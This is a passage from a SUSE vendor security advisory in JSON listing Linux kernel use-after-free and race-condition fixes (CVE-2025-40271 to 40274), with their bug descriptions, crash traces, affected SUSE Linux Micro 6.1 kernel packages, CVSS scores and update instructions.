"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/proc: fix uaf in proc_readdir_de()\n\nPde is erased from subdir rbtree through rb_erase(), but not set the node\nto EMPTY, which may result in uaf access. We should use RB_CLEAR_NODE()\nset the erased node to EMPTY, then pde_subdir_next() will return NULL to\navoid uaf access.\n\nWe found an uaf issue while using stress-ng testing, need to run testcase\ngetdent and tun in the same time. The steps of the issue is as follows:\n\n1) use getdent to traverse dir /proc/pid/net/dev_snmp6/, and current\n pde is tun3;\n\n2) in the [time windows] unregister netdevice tun3 and tun2, and erase\n them from rbtree. erase tun3 first, and then erase tun2. the\n pde(tun2) will be released to slab;\n\n3) continue to getdent process, then pde_subdir_next() will return\n pde(tun2) which is released, it will case uaf access.\n\nCPU 0 | CPU 1\n-------------------------------------------------------------------------\ntraverse dir /proc/pid/net/dev_snmp6/ | unregister_netdevice(tun-\u003edev) //tun3 tun2\nsys_getdents64() |\n iterate_dir() |\n proc_readdir() |\n proc_readdir_de() | snmp6_unregister_dev()\n pde_get(de); | proc_remove()\n read_unlock(\u0026proc_subdir_lock); | remove_proc_subtree()\n | write_lock(\u0026proc_subdir_lock);\n [time window] | rb_erase(\u0026root-\u003esubdir_node, \u0026parent-\u003esubdir);\n | write_unlock(\u0026proc_subdir_lock);\n read_lock(\u0026proc_subdir_lock); |\n next = pde_subdir_next(de); |\n pde_put(de); |\n de = next; //UAF |\n\nrbtree of dev_snmp6\n |\n pde(tun3)\n / \\\n NULL pde(tun2)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40271",
"url": "https://www.suse.com/security/cve/CVE-2025-40271"
},
{
"category": "external",
"summary": "SUSE Bug 1255297 for CVE-2025-40271",
"url": "https://bugzilla.suse.com/1255297"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40271"
},
{
"cve": "CVE-2025-40272",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40272"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/secretmem: fix use-after-free race in fault handler\n\nWhen a page fault occurs in a secret memory file created with\n`memfd_secret(2)`, the kernel will allocate a new folio for it, mark the\nunderlying page as not-present in the direct map, and add it to the file\nmapping.\n\nIf two tasks cause a fault in the same page concurrently, both could end\nup allocating a folio and removing the page from the direct map, but only\none would succeed in adding the folio to the file mapping. The task that\nfailed undoes the effects of its attempt by (a) freeing the folio again\nand (b) putting the page back into the direct map. However, by doing\nthese two operations in this order, the page becomes available to the\nallocator again before it is placed back in the direct mapping.\n\nIf another task attempts to allocate the page between (a) and (b), and the\nkernel tries to access it via the direct map, it would result in a\nsupervisor not-present page fault.\n\nFix the ordering to restore the direct map before the folio is freed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40272",
"url": "https://www.suse.com/security/cve/CVE-2025-40272"
},
{
"category": "external",
"summary": "SUSE Bug 1254832 for CVE-2025-40272",
"url": "https://bugzilla.suse.com/1254832"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40272"
},
{
"cve": "CVE-2025-40273",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40273"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: free copynotify stateid in nfs4_free_ol_stateid()\n\nTypically copynotify stateid is freed either when parent\u0027s stateid\nis being close/freed or in nfsd4_laundromat if the stateid hasn\u0027t\nbeen used in a lease period.\n\nHowever, in case when the server got an OPEN (which created\na parent stateid), followed by a COPY_NOTIFY using that stateid,\nfollowed by a client reboot. New client instance while doing\nCREATE_SESSION would force expire previous state of this client.\nIt leads to the open state being freed thru release_openowner-\u003e\nnfs4_free_ol_stateid() and it finds that it still has copynotify\nstateid associated with it. We currently print a warning and is\ntriggerred\n\nWARNING: CPU: 1 PID: 8858 at fs/nfsd/nfs4state.c:1550 nfs4_free_ol_stateid+0xb0/0x100 [nfsd]\n\nThis patch, instead, frees the associated copynotify stateid here.\n\nIf the parent stateid is freed (without freeing the copynotify\nstateids associated with it), it leads to the list corruption\nwhen laundromat ends up freeing the copynotify state later.\n\n[ 1626.839430] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n[ 1626.842828] Modules linked in: nfnetlink_queue nfnetlink_log bluetooth cfg80211 rpcrdma rdma_cm iw_cm ib_cm ib_core nfsd nfs_acl lockd grace nfs_localio ext4 crc16 mbcache jbd2 overlay uinput snd_seq_dummy snd_hrtimer qrtr rfkill vfat fat uvcvideo snd_hda_codec_generic videobuf2_vmalloc videobuf2_memops snd_hda_intel uvc snd_intel_dspcfg videobuf2_v4l2 videobuf2_common snd_hda_codec snd_hda_core videodev snd_hwdep snd_seq mc snd_seq_device snd_pcm snd_timer snd soundcore sg loop auth_rpcgss vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vmw_vmci vsock xfs 8021q garp stp llc mrp nvme ghash_ce e1000e nvme_core sr_mod nvme_keyring nvme_auth cdrom vmwgfx drm_ttm_helper ttm sunrpc dm_mirror dm_region_hash dm_log iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse dm_multipath dm_mod nfnetlink\n[ 1626.855594] CPU: 2 UID: 0 PID: 199 Comm: kworker/u24:33 Kdump: loaded Tainted: G B W 6.17.0-rc7+ #22 PREEMPT(voluntary)\n[ 1626.857075] Tainted: [B]=BAD_PAGE, [W]=WARN\n[ 1626.857573] Hardware name: VMware, Inc. VMware20,1/VBSA, BIOS VMW201.00V.24006586.BA64.2406042154 06/04/2024\n[ 1626.858724] Workqueue: nfsd4 laundromat_main [nfsd]\n[ 1626.859304] pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 1626.860010] pc : __list_del_entry_valid_or_report+0x148/0x200\n[ 1626.860601] lr : __list_del_entry_valid_or_report+0x148/0x200\n[ 1626.861182] sp : ffff8000881d7a40\n[ 1626.861521] x29: ffff8000881d7a40 x28: 0000000000000018 x27: ffff0000c2a98200\n[ 1626.862260] x26: 0000000000000600 x25: 0000000000000000 x24: ffff8000881d7b20\n[ 1626.862986] x23: ffff0000c2a981e8 x22: 1fffe00012410e7d x21: ffff0000920873e8\n[ 1626.863701] x20: ffff0000920873e8 x19: ffff000086f22998 x18: 0000000000000000\n[ 1626.864421] x17: 20747562202c3839 x16: 3932326636383030 x15: 3030666666662065\n[ 1626.865092] x14: 6220646c756f6873 x13: 0000000000000001 x12: ffff60004fd9e4a3\n[ 1626.865713] x11: 1fffe0004fd9e4a2 x10: ffff60004fd9e4a2 x9 : dfff800000000000\n[ 1626.866320] x8 : 00009fffb0261b5e x7 : ffff00027ecf2513 x6 : 0000000000000001\n[ 1626.866938] x5 : ffff00027ecf2510 x4 : ffff60004fd9e4a3 x3 : 0000000000000000\n[ 1626.867553] x2 : 0000000000000000 x1 : ffff000096069640 x0 : 000000000000006d\n[ 1626.868167] Call trace:\n[ 1626.868382] __list_del_entry_valid_or_report+0x148/0x200 (P)\n[ 1626.868876] _free_cpntf_state_locked+0xd0/0x268 [nfsd]\n[ 1626.869368] nfs4_laundromat+0x6f8/0x1058 [nfsd]\n[ 1626.869813] laundromat_main+0x24/0x60 [nfsd]\n[ 1626.870231] process_one_work+0x584/0x1050\n[ 1626.870595] worker_thread+0x4c4/0xc60\n[ 1626.870893] kthread+0x2f8/0x398\n[ 1626.871146] ret_from_fork+0x10/0x20\n[ 1626.871422] Code: aa1303e1 aa1403e3 910e8000 97bc55d7 (d4210000)\n[ 1626.871892] SMP: stopping secondary CPUs",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40273",
"url": "https://www.suse.com/security/cve/CVE-2025-40273"
},
{
"category": "external",
"summary": "SUSE Bug 1254828 for CVE-2025-40273",
"url": "https://bugzilla.suse.com/1254828"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40273"
},
{
"cve": "CVE-2025-40274",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40274"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying\n\nWhen unbinding a memslot from a guest_memfd instance, remove the bindings\neven if the guest_memfd file is dying, i.e. even if its file refcount has\ngone to zero. If the memslot is freed before the file is fully released,\nnullifying the memslot side of the binding in kvm_gmem_release() will\nwrite to freed memory, as detected by syzbot+KASAN:\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353\n Write of size 8 at addr ffff88807befa508 by task syz.0.17/6022\n\n CPU: 0 UID: 0 PID: 6022 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353\n __fput+0x44c/0xa70 fs/file_table.c:468\n task_work_run+0x1d4/0x260 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop+0xe9/0x130 kernel/entry/common.c:43\n exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline]\n syscall_exit_to_user_mode_work include/linux/entry-common.h:175 [inline]\n syscall_exit_to_user_mode include/linux/entry-common.h:210 [inline]\n do_syscall_64+0x2bd/0xfa0 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x7fbeeff8efc9\n \u003c/TASK\u003e\n\n Allocated by task 6023:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:397 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:414\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x3e2/0x700 mm/slub.c:5758\n kmalloc_noprof include/linux/slab.h:957 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n kvm_set_memory_region+0x747/0xb90 virt/kvm/kvm_main.c:2104\n kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154\n kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\n Freed by task 6023:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:584\n poison_slab_object mm/kasan/common.c:252 [inline]\n __kasan_slab_free+0x5c/0x80 mm/kasan/common.c:284\n kasan_slab_free include/linux/kasan.h:234 [inline]\n slab_free_hook mm/slub.c:2533 [inline]\n slab_free mm/slub.c:6622 [inline]\n kfree+0x19a/0x6d0 mm/slub.c:6829\n kvm_set_memory_region+0x9c4/0xb90 virt/kvm/kvm_main.c:2130\n kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154\n kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nDeliberately don\u0027t acquire filemap invalid lock when the file is dying as\nthe lifecycle of f_mapping is outside the purview of KVM. Dereferencing\nthe mapping is *probably* fine, but there\u0027s no need to invalidate anything\nas memslot deletion is responsible for zapping SPTEs, and the only code\nthat can access the dying file is kvm_gmem_release(), whose core code is\nmutual\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40274",
"url": "https://www.suse.com/security/cve/CVE-2025-40274"
},
{
"category": "external",
"summary": "SUSE Bug 1254830 for CVE-2025-40274",
"url": "https://bugzilla.suse.com/1254830"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
